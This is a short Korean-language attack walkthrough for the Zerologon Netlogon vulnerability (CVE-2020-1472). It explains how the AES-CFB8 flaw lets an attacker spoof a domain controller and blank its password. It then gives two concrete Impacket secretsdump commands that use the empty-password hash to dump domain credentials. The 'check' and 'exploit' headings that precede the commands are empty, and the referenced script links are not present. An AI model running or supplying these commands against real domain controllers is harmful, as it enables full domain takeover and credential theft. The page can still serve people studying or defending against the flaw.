
[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) 권한 상승 (Zerologon)
[CVE-2020-1472] Netlogon 원격 프로토콜 호출(MS-NRPC) 권한 상승 (Zerologon)
여기에 설명된 공격은 도메인 가입 컴퓨터의 신뢰성과 신원을 도메인 컨트롤러(DC)에 증명하는 암호화 인증 프로토콜(AES-CFB8의 안전하지 않은 사용)의 결함을 이용합니다. AES 운영 모드의 잘못된 사용으로 인해 모든 컴퓨터 계정(DC 자체 포함)의 신원을 스푸핑하고 해당 도메인 계정에 빈 암호(여러 필드가 0으로 채워진 여러 Netlogon 메시지를 보내는 것만으로)를 설정할 수 있습니다. 이후 이를 사용하여 도메인 관리자 자격 증명을 획득한 다음 원래 DC 암호를 복원할 수 있습니다.
CVE-2020-1472 점검을 위해
CVE-2020-1472 악용을 위해
그런 다음 다음 명령 중 하나를 실행합니다
형식 예 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
형식 예 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

원본 블로그 게시물은 여기에서 확인할 수 있습니다
Python 테스트 스크립트가 포함된 원본 저장소는 여기에서 확인할 수 있습니다
Python 악용 스크립트가 포함된 원본 저장소는 여기에서 확인할 수 있습니다